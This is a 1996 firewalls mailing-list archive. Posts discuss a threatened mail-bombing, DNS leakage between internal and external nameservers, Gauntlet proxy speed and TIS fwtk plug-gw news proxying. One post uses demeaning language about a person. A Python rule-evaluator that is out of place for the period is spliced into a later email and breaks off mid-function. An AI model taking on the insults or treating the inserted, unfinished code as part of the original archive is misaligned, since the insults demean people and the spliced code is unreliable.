X-Mailer: Mozilla 2.0 (Win95; U)
Mime-Version: 1.0
To: sansom@connectix.com
Cc: firewalls@greatcircle.com
Subject: email bombing
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Rob -

This happened to me some months ago at a different company. I immediately
escalated it through my management to our CEO, who contacted the CEO of the
person who made the threat (and, as it turned out, actually carried it out
and brought down our corporate net). He was fired on the spot, and another
individual was assigned to work with us to resolve the issues.
As it turned out, there *were* no issues - simply a bully who didn't have a
clue what he was doing and didn't understand either the manuals or our
verbal walk-throughs...

These people are bottom feeders and do not belong in positions of
authority. There are plenty of windows and toilets to clean, and that is
all they're fit for.

Note that the preceding opinion is my own, and the actions were taken by a
different employer, and in no way represents the opinions and/or potential
actions of my current employer. (But the only way to get rid of a cockroach
is to squish it...)

-Barb

From firewalls-owner Tue Jul 9 12:49:28 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id MAA12466 for firewalls-outgoing; Tue, 9 Jul 1996 12:35:33 -0700 (PDT)
Received: from lokkur.dexter.mi.us (lokkur.dexter.mi.us [148.59.2.1]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id MAA12443 for ; Tue, 9 Jul 1996 12:35:22 -0700 (PDT)
Received: (from scs@localhost) by lokkur.dexter.mi.us (8.7.5/8.7.5/lokkur-1.1-scs) id PAA08735; Tue, 9 Jul 1996 15:32:31 -0400 (EDT)
To: firewalls@GreatCircle.COM
Path: lokkur.dexter.mi.us!not-for-mail
From: scs@lokkur.dexter.mi.us (Steve Simmons)
Newsgroups: local.firewalls
Subject: Re: Threats and Nasty Emails
Date: 9 Jul 1996 15:32:31 -0400
Organization: Inland Sea
Lines: 22
Distribution: local
Message-ID: <4ruc4f$8gs@lokkur.dexter.mi.us>
References: <9607091622.AA12030@su1.in.net>
X-Newsreader: NN version 6.5.0 CURRENT #2
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Frank Willoughby writes:

> At 09:06 AM 7/9/96 -0700, Rob Sansom allegedly wrote:
> > Although this is not really related to firewalls, I was wondering if
> > anyone had a suggestion for a response to a belligerent individual who
> > has been threatening to 'mail bomb' our site, as well as slander our
> > company in the UK. . . .
Frank writes some good advice, and then says:

> If the customer does not have a legitimate complaint, explain to the
> individual why the complaint is not valid. . . .

Absolutely not. You're a sysadmin, not customer support or a service
bureau for outside things. Take the issues to your management, and let
them deal with it. You shouldn't in any way contact the customer.

--
``You gotta distinguish between telling a tale for amusement, as in "Well,
there I was facing down the crowds at Riotcon...", and telling it for the
record, as in "Well, you see, officer, it happened like this...".
(Actually, that might not be the best example.)''
-- Chris Clayton, in private email

From firewalls-owner Tue Jul 9 15:04:37 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id OAA21147 for firewalls-outgoing; Tue, 9 Jul 1996 14:48:24 -0700 (PDT)
Received: from zoltar.cse.ucsc.edu (zoltar.cse.ucsc.edu [128.114.134.133]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id OAA21138 for ; Tue, 9 Jul 1996 14:48:18 -0700 (PDT)
Received: (from clay@localhost) by zoltar.cse.ucsc.edu (8.6.10/8.6.9) id OAA24288; Tue, 9 Jul 1996 14:45:48 -0700
Date: Tue, 9 Jul 1996 14:45:47 -0700 (PDT)
From: Clay Shields
To: Firewalls@GreatCircle.COM
Subject: Quality of Service and firewalls
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

I was wondering if there has been any discussion about implementing a
quality of service guarantee protocol (such as RSVP) on a firewall. It
seems to me that a firewall has the potential to become a bottleneck.
Because of this the reservation protocol would have to run on the firewall
as well, and any connection forming would have to reserve resources at the
firewall.
This would lead to different priorities of filtering (and perhaps proxying)
which might require several passes at the packet - one first to allocate an
incoming packet to a priority queue, then others to determine the fate of
the packet. In addition, it might enable a "denial of quality of service"
attack, in which bombarding the firewall would degrade its performance such
that it could no longer provide the level of service required.

Are there any vendors addressing these questions?

Clay

From firewalls-owner Tue Jul 9 17:34:27 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id RAA27956 for firewalls-outgoing; Tue, 9 Jul 1996 17:23:04 -0700 (PDT)
Received: from okjunc.junction.net (okjunc.junction.net [199.166.227.1]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id RAA27949 for ; Tue, 9 Jul 1996 17:22:58 -0700 (PDT)
Received: from sidhe.memra.com (sidhe.memra.com [199.166.227.105]) by okjunc.junction.net (8.6.11/8.6.11) with SMTP id RAA25701 for ; Tue, 9 Jul 1996 17:22:53 -0700
Date: Tue, 9 Jul 1996 17:17:04 -0700 (PDT)
From: Michael Dillon
To: firewalls@GreatCircle.COM
Subject: Re: Threats and Nasty Emails
In-Reply-To: <9607091622.AA12030@su1.in.net>
Message-ID:
Organization: Memra Software Inc. - Internet consulting
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

On Tue, 9 Jul 1996, Frank Willoughby wrote:

> Allegedly, the customer made threats to your organization. Proving this
> in a court of law will be difficult at best. All their lawyer has to do
> is mumble something about "mail spoofing" and make a feeble attempt to
> explain what it is and the burden of proof will be on you to prove (to
> a judge or a lay jury) that the customer did in fact send the mail.

This is easier than you think.
If you print out copies of all messages with full headers as well as your
log files then you may find that the courts accept that as conclusive
proof. There have been cases in the USA where such evidence was accepted.
You should make sure to do the printouts immediately in front of witnesses
and then have them notarized. These have as much legal standing as dated
notes taken in your handwriting in conjunction with testimony to the effect
that you saw something and then noted it on paper soon after the event took
place. On the other hand if you don't do your printouts until the day
before the trial, expect them to be given much less serious consideration.

BTW I am not a lawyer.

> If it was me, I would contact the customer and ask the customer to
> explain what their problem is and promise to escalate their problem
> through channels to see that it is resolved one way or another.

Most people just refund the money, maybe send them some sort of gift as
well.

Michael Dillon                                   ISP & Internet Consulting
Memra Software Inc.                                 Fax: +1-604-546-3049
http://www.memra.com                             E-mail: michael@memra.com

From firewalls-owner Wed Jul 10 02:49:27 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id CAA14703 for firewalls-outgoing; Wed, 10 Jul 1996 02:40:17 -0700 (PDT)
Received: from pinelands.oldmutual.com (pinelands.oldmutual.co.za [196.22.118.1]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id CAA14696 for ; Wed, 10 Jul 1996 02:39:57 -0700 (PDT)
Received: by pinelands.oldmutual.com; id AA03732; Wed, 10 Jul 96 11:35:14+020
Received: from mail(160.123.45.3) by pinelands.oldmutual.com via smap (V3.1)
Received: from inv735524 ([160.123.1.81]) by internet_mail.oldmutual.com
Message-Id: <31E37948.311A@oldmutual.com>
Date: Wed, 10 Jul 1996 11:35:04 +0200
From: jbarnes@oldmutual.com (Jay Barnes)
Organization: Old Mutual
X-Mailer: Mozilla 2.0Eb1-OM (WinNT; I)
Mime-Version: 1.0
To: firewalls
Subject: Re: Gauntlet - How good is it?
References: <9606280743.AA15395@spibm02>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Rolf Weber wrote:
>
> > We run Gauntlet 3.1.1 on a TIS supplied PC.
> > We have the following major problems (I'll spare you the list of
> > minor troubles we are having.)
> > 1) Slow HTTP access (A complicated page read on a machine inside
> > the firewall can take 2-4 times longer than the same page read outside the
> > firewall)
> > 2) Internet Explorer 2.0, on Windows 95 can not be used to access
> > most Secure HTTP sites.
>
> i'm running the fwtk and don't have such problems.
> did you ask TIS for patches?
> are you sure the proxy makes it slow and not your net?
> are you sure the proxy makes it slow and not your PC?
>
> another point:
> even if you'd be right with your complaints, you're obviously missing
> the point of firewalls.
> security is the first and foremost goal.
>
> rolf
> --

We speeded up internal web serving by several 100% just by configuring the
"no proxy for" element in Netscape.

Jay

From firewalls-owner Wed Jul 10 03:19:29 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id DAA15416 for firewalls-outgoing; Wed, 10 Jul 1996 03:02:53 -0700 (PDT)
Received: from sic.se (mailbox.sic.se [194.236.7.200]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id DAA15402 for ; Wed, 10 Jul 1996 03:02:44 -0700 (PDT)
Received: from pamela.sic.se (pamela.sic.se [194.236.7.44]) by sic.se (8.7.5/8.7.2) with SMTP id LAA04419 for ; Wed, 10 Jul 1996 11:58:08 +0200 (MET DST)
X-Mailer: InterCon tcpCONNECT4 4.0b26 (Macintosh)
MIME-Version: 1.0
Message-Id: <9607101200.AA18414@pamela.sic.se>
Date: Wed, 10 Jul 1996 12:00:18 +0100
From: "Stefan Berg"
To: firewalls@GreatCircle.com
Subject: News-proxy for TIS fwtk?
Content-Type: Text/Plain; charset=US-ASCII
Content-Disposition: Inline
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Hi there,

do you have any information on how to set up a News proxy
for the TIS firewall toolkit?

/Stefan
stefan@sic.se

From firewalls-owner Wed Jul 10 03:34:27 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id DAA17113 for firewalls-outgoing; Wed, 10 Jul 1996 03:30:45 -0700 (PDT)
Received: from sic.se (mailbox.sic.se [194.236.7.200]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id DAA17100 for ; Wed, 10 Jul 1996 03:30:36 -0700 (PDT)
Received: from pamela.sic.se (pamela.sic.se [194.236.7.44]) by sic.se (8.7.5/8.7.2) with SMTP id MAA04520 for ; Wed, 10 Jul 1996 12:26:08 +0200 (MET DST)
X-Mailer: InterCon tcpCONNECT4 4.0b26 (Macintosh)
MIME-Version: 1.0
Message-Id: <9607101228.AA19529@pamela.sic.se>
Date: Wed, 10 Jul 1996 12:28:19 +0100
From: "Stefan Berg"
To: firewalls@GreatCircle.com
Subject: Re: Gauntlet - How good is it?
Content-Type: Text/Plain; charset=US-ASCII
Content-Disposition: Inline
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

> Rolf Weber wrote:
> >
> > > We run Gauntlet 3.1.1 on a TIS supplied PC.
> > > We have the following major problems (I'll spare you the list of
> > > minor troubles we are having.)
> > > 1) Slow HTTP access (A complicated page read on a
> > > machine inside the firewall can take 2-4 times longer than the
> > > same page read outside the firewall)
> > > 2) Internet Explorer 2.0, on Windows 95 can not be used
> > > to access most Secure HTTP sites.
> >
> > i'm running the fwtk and don't have such problems.
> > did you ask TIS for patches?
> > are you sure the proxy makes it slow and not your net?
> > are you sure the proxy makes it slow and not your PC?
> > another point:
> > even if you'd be right with your complaints, you're obviously missing
> > the point of firewalls.
> > security is the first and foremost goal.
> > rolf
> > --
> We speeded up internal web serving by several 100% just by
> configuring the "no proxy for" element in Netscape.
>
> Jay
>

We are having the exact same situation, and increased speed a little by
adding the "No proxy for"-option. BUT even before we did so we had quite a
small difference in response times and HTTP access in general compared to
external sites.

My suggestion is that you go through your network in detail to check your
DNS configuration. Our biggest advantage was installing a switch to
separate different network sections from each other. Now THAT really gave
us better internal speed :)

/Stefan

From firewalls-owner Wed Jul 10 03:45:15 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id DAA16510 for firewalls-outgoing; Wed, 10 Jul 1996 03:18:43 -0700 (PDT)
Received: from mog.ucd.ie (mog.ucd.ie [193.1.143.84]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id DAA16450 for ; Wed, 10 Jul 1996 03:18:22 -0700 (PDT)
Message-Id: <199607101018.DAA16450@miles.greatcircle.com>
Received: from mog.ucd.ie by mog.ucd.ie id <16488-0@mog.ucd.ie>;
To: firewalls-digest@GreatCircle.COM
Subject: Re: DNS leakage
Cc: ShepherdR@Aforbes.co.za
Date: Wed, 10 Jul 1996 11:18:30 +0100
From: Louis Twomey
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Hi,

This configuration works fine for me on two Linux 1.2.13 machines running
bind-4.9.3-B9. Is there perhaps some reference in your named.boot file, on
your external nameserver, to your internal nameserver (e.g. a secondary
entry pointing at your internal nameserver) ?
The following is the configuration that I use for the site xyz.ie :

Proxy server/External nameserver (IP address 1.2.3.4) :
-----------------------------------------------------
named.boot :
  :
  primary     xyz.ie    xyz-external.hosts
  :

resolv.conf :
  domain      xyz.ie
  nameserver  192.168.1.10


Internal nameserver (IP address 192.168.1.10) :
---------------------------------------------
named.boot :
  :
  primary     xyz.ie    xyz-internal.hosts
  secondary   xyz.ie    1.2.3.4    xyz-external.hosts
  :
  forwarders  1.2.3.4

resolv.conf :
  domain      xyz.ie
  nameserver  127.0.0.1

While on this topic, I would like to pose my own question. I have the same
configuration as above running on two Dec Alpha machines (running Digital
Unix 3.2D), and both machines are running bind-4.9.3-REL. When the
internal nameserver loads the data for the secondary (external) domain
xyz.ie, this overwrites the data for the primary (internal) domain xyz.ie
in memory, and the machine can subsequently no longer resolve queries on
this primary domain. Has anyone seen, and resolved, this problem with
either this platform or with this version of bind ? I have already
addressed this question to the bind-users mailing list twice, but I receive
mail only intermittently from this list and either no-one replied or these
replies fell through the cracks (except, that is, for a few replies which
questioned my sanity for wanting to implement such a named configuration).

Regards,
Louis Twomey,
Computer Centre,
University College Dublin,
Ireland.

> Hi,
>
> I run a TIS FWTK Firewall on a Linux 1.2.13 machine. This machine also
> runs the DNS server for the "outside". On the "inside" there's an NT
> machine running BIND for internal DNS. The FW is set up to use the
> inside NS for lookups and the inside NS forwards all queries to the FW
> DNS server.
>
> Problem is this:
> The last time my zone was transferred to my ISP, the INTERNAL names
> suddenly appeared on the internet!
> Of course this wrecked e-mail and
> other things as well, but how is this possible? How can the outside DNS
> provide the secondary with any information regarding the inside? BTW the
> inside network is not even accessible from the Internet (and thus the
> secondary DNS). Any ideas?
>
> Rudie

From firewalls-owner Wed Jul 10 04:35:33 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id EAA20355 for firewalls-outgoing; Wed, 10 Jul 1996 04:04:07 -0700 (PDT)
Received: from stingray.ivision.co.uk (stingray.ivision.co.uk [194.154.62.8]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id EAA20317 for ; Wed, 10 Jul 1996 04:03:52 -0700 (PDT)
Received: from stingray.ivision.co.uk [194.154.62.8]
Date: Wed, 10 Jul 1996 11:57:09 +0100 (BST)
From: Neil A Carson
To: Stefan Berg
cc: firewalls@GreatCircle.com
Subject: Re: News-proxy for TIS fwtk?
In-Reply-To: <9607101200.AA18414@pamela.sic.se>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

On Wed, 10 Jul 1996, Stefan Berg wrote:

> Hi there,
>
> do you have any information on how to set up a News proxy
> for the TIS firewall toolkit?

I assumed with TIS that the way they "intended" to do this on the firewall
itself was to use plug-gw to plug the NNTP connection through the firewall
to a secure external news server.

Yours Aye,

Neil

* Neil A Carson * Internet Vision Ltd.
* E-Mail: neil@ivision.co.uk, Phone: (0171) 589 4500

From firewalls-owner Wed Jul 10 04:49:22 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id EAA23208 for firewalls-outgoing; Wed, 10 Jul 1996 04:39:18 -0700 (PDT)
Received: from sic.se (mailbox.sic.se [194.236.7.200]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id EAA23177 for ; Wed, 10 Jul 1996 04:39:02 -0700 (PDT)
Received: from pamela.sic.se (pamela.sic.se [194.236.7.44]) by sic.se (8.7.5/8.7.2) with SMTP id NAA04702 for ; Wed, 10 Jul 1996 13:34:33 +0200 (MET DST)
X-Mailer: InterCon tcpCONNECT4 4.0b26 (Macintosh)
MIME-Version: 1.0
Message-Id: <9607101336.AA44474@pamela.sic.se>
Date: Wed, 10 Jul 1996 13:36:44 +0100
From: "Stefan Berg"
To: firewalls@GreatCircle.com
Subject: Re: News-proxy for TIS fwtk?
Content-Type: Text/Plain; charset=US-ASCII
Content-Disposition: Inline
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Great thanks to Shepherd Rudie and Jean-Francois Zwobada for your help.
My news works just fine now :)

/Stefan

From firewalls-owner Wed Jul 10 05:04:24 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id EAA22634 for firewalls-outgoing; Wed, 10 Jul 1996 04:27:48 -0700 (PDT)
Received: from scruz.net (nic.scruz.net [165.227.1.2]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id EAA22624 for ; Wed, 10 Jul 1996 04:27:38 -0700 (PDT)
Received: from x.pica.army.mil by scruz.net (8.7.3/1.34)
Date: Wed, 10 Jul 96 07:32:31 PST
From: rich
Subject: Looking for "hot shot" - security consultant
To: firewalls@greatcircle.com
X-PRIORITY: 3 (Normal)
X-Mailer: Chameleon 4.6.3, TCP/IP for Windows, NetManage Inc.
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

I will make this brief - My company is looking for someone to be a senior
security consultant. lots of travel, but really good money.
You need to be good at Unix, security, NT, Internet, etc (if you have the
experience, you will know!) You must also be a good public speaker, as many
times you will be doing seminars and not just consulting.

If interested, drop me email for more details. (I did not want to clutter
this list too much...)

Thanks,

Rich Fitzgerald
Berntein & Associates
(408) 456-0430
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
** Remember -- Life is NOT a dress rehearsal!
(nor is it a small furry animal with funny feet and floppy ears...)

From firewalls-owner Wed Jul 10 05:04:32 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id EAA20896 for firewalls-outgoing; Wed, 10 Jul 1996 04:09:32 -0700 (PDT)
Received: from igubu.saix.co.za (igubu.saix.net [196.25.1.1]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id EAA20868 for ; Wed, 10 Jul 1996 04:09:15 -0700 (PDT)
Received: from afjhb1exch1.aforbes.co.za
Received: by afjhb1exch1.aforbes.co.za with Microsoft Exchange (IMC 4.0.837.3)
Message-ID:
From: Shepherd Rudie
To: "'Stefan Berg'"
Cc: "'firewalls@greatcircle.com'"
Subject: RE: News-proxy for TIS fwtk?
Date: Wed, 10 Jul 1996 13:08:47 +0200
X-Mailer: Microsoft Exchange Server Internet Mail Connector Version 4.0.837.3
MIME-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: 7bit
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Set up a plug-gw to point to your news server and have all your newsreaders
point to the firewall as the news server:

netperm-table:

  plug-gw: port nntp *.inside.com -plug-to news.your-isp.com -port nntp

Hope it helps!

Rudie

> ----------
> From: Stefan Berg[SMTP:stefan@sic.se]
> Sent: Wednesday, July 10, 1996 1:00 PM
> To: firewalls@GreatCircle.com
> Subject: News-proxy for TIS fwtk?
>
>
> Hi there,
>
> do you have any information on how to set up a News proxy
> for the TIS firewall toolkit?
>
> /Stefan
> stefan@sic.se
>
>

From firewalls-owner Wed Jul 10 05:19:24 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id FAA25010 for firewalls-outgoing; Wed, 10 Jul 1996 05:04:58 -0700 (PDT)
Received: from pink.webfactory.ie ([194.106.133.35]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id FAA24986; Wed, 10 Jul 1996 05:04:37 -0700 (PDT)
Received: (from root@localhost) by pink.webfactory.ie (8.7.5/8.7.3) id NAA15149; Wed, 10 Jul 1996 13:02:07 +0100
Received: from blonde.webfactory.ie(194.106.133.194) by pink.webfactory.ie via smap (V1.3)
Received: by webfactory.ie (Smail3.1.29.1 #3)
Received: from purple.webfactory.ie(194.106.133.195) by blonde.webfactory.ie via smap (V1.3)
Date: Wed, 10 Jul 1996 13:03:14 +0100 (BST)
From: simon
Reply-To: simon
Subject: Re: DNS leakage
To: firewalls@GreatCircle.COM
cc: firewalls-digest@GreatCircle.COM
In-Reply-To: <199607101018.DAA16450@miles.greatcircle.com>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; CHARSET=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

> The following is the configuration that I use for the site xyz.ie :
>
> Proxy server/External nameserver (IP address 1.2.3.4) :
> -----------------------------------------------------
> named.boot :
>   :
>   primary     xyz.ie    xyz-external.hosts
>   :
>
> resolv.conf :
>   domain      xyz.ie
>   nameserver  192.168.1.10
>
>
> Internal nameserver (IP address 192.168.1.10) :
> ---------------------------------------------
> named.boot :
>   :
>   primary     xyz.ie    xyz-internal.hosts
>   secondary   xyz.ie    1.2.3.4    xyz-external.hosts
>   :
>   forwarders  1.2.3.4
>
> resolv.conf :
>   domain      xyz.ie
>   nameserver  127.0.0.1
>

Hi,

We also have a similar setup - but with some differences:

The named.boot file on the internal server should also contain a "slave"
line - so that the internal server does not attempt to contact any other
DNS servers, regardless of how slow the external server (1.2.3.4) may be.
This situation should also be strengthened by having the relevant packet
filters in place - so that the internal server should not be able to
contact any servers other than the external 1.2.3.4, and so that no zone
transfer can take place from the internal machine to any external hosts.

The external server's resolv.conf should have a xfernets directive so that
only trusted external hosts can do a zone transfer.

I don't think that there is any point in having the internal act as a
secondary to the external server. The internal server should have DNS
entries for all the machines on the network - and the external one should
have just those entries for machines that have direct (ie non-proxied)
access to the internet. Hence there is no need for the internal server to
act as a secondary for the external server - so the internal data would not
be overwritten by the (superfluous) secondary data.

>
> While on this topic, I would like to pose my own question. I have the same
> configuration as above running on two Dec Alpha machines (running Digital
> Unix 3.2D), and both machines are running bind-4.9.3-REL. When the
> internal nameserver loads the data for the secondary (external) domain
> xyz.ie, this overwrites the data for the primary (internal) domain xyz.ie in
> memory, and the machine can subsequently no longer resolve queries on this
> primary domain. Has anyone seen, and resolved, this problem with either
> this platform or with this version of bind ? I have already addressed this
> question to the bind-users mailing list twice, but I receive mail only
> intermittently from this list and either no-one replied or these replies
> fell through the cracks (except, that is, for a few replies which questioned
> my sanity for wanting to implement such a named configuration).
>
> > Hi,
> >
> > I run a TIS FWTK Firewall on a Linux 1.2.13 machine. This machine also
> > runs the DNS server for the "outside".
> > On the "inside" there's an NT
> > machine running BIND for internal DNS. The FW is set up to use the
> > inside NS for lookups and the inside NS forwards all queries to the FW
> > DNS server.
> >
> > Problem is this:
> > The last time my zone was transferred to my ISP, the INTERNAL names
> > suddenly appeared on the internet! Of course this wrecked e-mail and
> > other things as well, but how is this possible? How can the outside DNS
> > provide the secondary with any information regarding the inside? BTW the
> > inside network is not even accessible from the Internet (and thus the
> > secondary DNS). Any ideas?
> >
> > Rudie

Cheers,

Simon Walsh
Webfactory Ltd.

From firewalls-owner Wed Jul 10 05:24:26 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id EAA20712 for firewalls-outgoing; Wed, 10 Jul 1996 04:07:27 -0700 (PDT)
Received: from ns.NL.net (ns.NL.net [193.78.240.1]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id EAA20688 for ; Wed, 10 Jul 1996 04:07:03 -0700 (PDT)
Received: from lcnnl by ns.NL.net via EUnet
Received: from ge (ge.lcn.nl [192.168.214.20]) by gate.lcn.nl (8.6.12/8.6.12) with SMTP id MAA10525 for ; Wed, 10 Jul 1996 12:34:53 +0200
Message-Id: <199607101034.MAA10525@gate.lcn.nl>
Comments: Authenticated sender is
From: "Ge' Weijers"
Organization: LCN Planning/Scheduling BV
To: Firewalls@GreatCircle.COM
Date: Wed, 10 Jul 1996 12:38:20 MET
Subject: Re: email bombing
Reply-To: g.weijers@lcn.nl
X-Mailer: Pegasus Mail for Windows (v2.30)
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

> Date: Tue, 09 Jul 1996 12:22:21 -0700
> From: Barbara Jaarsma
> Subject: email bombing
>
> These people are bottom feeders and do not belong in positions of
> authority. There are plenty of windows and toilets to clean, and that
> is all they're fit for.

People cleaning your company's windows and toilets are a definite security
risk. Recruiting misfits does not seem to be the perfect strategy.
Ge

Ge' Weijers                                        tel. +31-24-3812212
LCN Planning/Scheduling BV                         fax. +31-24-3238074
E-mail: ge@lcn.nl
#include

From firewalls-owner Wed Jul 10 05:34:25 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id FAA26281 for firewalls-outgoing; Wed, 10 Jul 1996 05:18:33 -0700 (PDT)
Received: from su1.in.net (su1.in.net [199.0.62.2]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id FAA26255 for ; Wed, 10 Jul 1996 05:18:23 -0700 (PDT)
Received: from pm1-16.in.net by su1.in.net with SMTP (5.65/1.2-eef)
Date: Wed, 10 Jul 96 07:14:23 -0400
Message-Id: <9607101114.AA14010@su1.in.net>
X-Sender: frankw@in.net
X-Mailer: Windows Eudora Pro Version 2.1.2
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
To: firewalls@GreatCircle.com
From: Frank Willoughby
Subject: Re: Threats and Nasty Emails
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

At 03:32 PM 7/9/96 -0400, scs@lokkur.dexter.mi.us (Steve Simmons) allegedly wrote:

> Frank Willoughby writes:
> Frank writes some good advice, and then says:
>
> > If the customer does not have a legitimate complaint, explain to the
> > individual why the complaint is not valid. . . .
>
> Absolutely not. You're a sysadmin, not customer support or a service
> bureau for outside things. Take the issues to your management, and
> let them deal with it. You shouldn't in any way contact the customer.
> --

Steve, is of course, absolutely right on this. I should have said "a
customer support representative should explain..." Thanks for clarifying
this point.

Best Regards,

Frank

Any sufficiently advanced bug is indistinguishable from a feature.
-- Rich Kulawiec

The opinions expressed above are of the author and may not necessarily be
representative of Fortified Networks Inc.

Fortified Networks Inc.
- Information Security Consulting
http://www.fortified.com
Phone: (317) 573-0800 FAX: (317) 573-0817
Home of the Free Internet Firewall Evaluation Checklist

From firewalls-owner Wed Jul 10 05:37:06 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id EAA21903 for firewalls-outgoing; Wed, 10 Jul 1996 04:17:03 -0700 (PDT)
Received: from dtcro002.apogee-com.fr (firewall.apogee-com.fr [194.2.187.130]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id EAA21818 for ; Wed, 10 Jul 1996 04:16:29 -0700 (PDT)
Received: by dtcro002.apogee-com.fr; id NAA02811; Wed, 10 Jul 1996 13:10:19 +0200 (MET DST)
Received: from dtcxs001.apogee-com.fr(10.129.16.1) by firewall.apogee-com.fr via smap (V3.1.1)
Received: from ingpc003.apogee-com.fr by dtcxs001.apogee-com.fr (4.1/SMI-4.1)
Message-Id: <31E38F8E.7766@apogee-com.fr>
Date: Wed, 10 Jul 1996 13:10:06 +0200
From: Jean-Francois Zwobada
Organization: APOGEE Communications
X-Mailer: Mozilla 2.02 (Win95; I)
Mime-Version: 1.0
To: Stefan Berg
Cc: firewalls@GreatCircle.com
Subject: Re: News-proxy for TIS fwtk?
References: <9607101200.AA18414@pamela.sic.se>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Just use the plug-gw as this

  plug-gw: port nntp InternalNewsServer -plug-to ExternalNewsServer -port nntp
  plug-gw: port nntp ExternalNewsServer -plug-to InternalNewsServer -port nntp

This will allow both servers to initiate a connection on the port 119
restricting this connection to the other server. Make sure you have a
plug-gw proxy or netacl running and listening on this port.
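The two-rule plug-gw setup in the message above (and Rudie's single wildcard rule earlier in the thread) can be sanity-checked offline with the small rule evaluator below. This is an added example for this archive, not part of any of the posts and not code from the TIS Firewall Toolkit: it parses the "plug-gw: port ..." lines of a constructed netperm-table fragment and answers, for a given client and listening port, where the connection would be plugged to, or that it would be refused. The host names news.inside.example and news.isp.example are placeholders, and the host-pattern matching ('*' wildcards against the client name) is an approximation of fwtk's, not its actual matcher.

```python
"""Evaluate fwtk-style plug-gw rules from a netperm-table fragment.

Added example for the archive; not code from the TIS Firewall Toolkit.
Host matching approximates fwtk's '*' wildcard patterns with fnmatch.
"""
import fnmatch

# Constructed netperm-table fragment (placeholder host names):
# the two per-direction rules from the thread plus a wildcard variant.
NETPERM_TABLE = """\
# NNTP (port 119): only the two news servers may connect through the
# firewall, and each is plugged straight through to the other.
plug-gw: port nntp news.inside.example -plug-to news.isp.example -port nntp
plug-gw: port nntp news.isp.example -plug-to news.inside.example -port nntp
# Rudie's style: any inside host may reach the ISP's news server.
plug-gw: port nntp *.inside.example -plug-to news.isp.example -port nntp
plug-gw: timeout 300
"""

# Service names a netperm-table may use instead of numeric ports.
SERVICE_PORTS = {"nntp": 119, "smtp": 25, "http": 80}


def port_number(name):
    """Map a numeric string or a known service name to a port number."""
    if name.isdigit():
        return int(name)
    return SERVICE_PORTS[name]


def parse_plug_rules(text):
    """Return (listen_port, host_pattern, dest_host, dest_port) tuples
    for every 'plug-gw: port ...' line; other plug-gw options and
    comment lines are skipped."""
    rules = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line.startswith("plug-gw:"):
            continue
        fields = line.split(":", 1)[1].split()
        if not fields or fields[0] != "port":
            continue  # e.g. 'plug-gw: timeout 300'
        listen_port = port_number(fields[1])
        host_pattern = fields[2]
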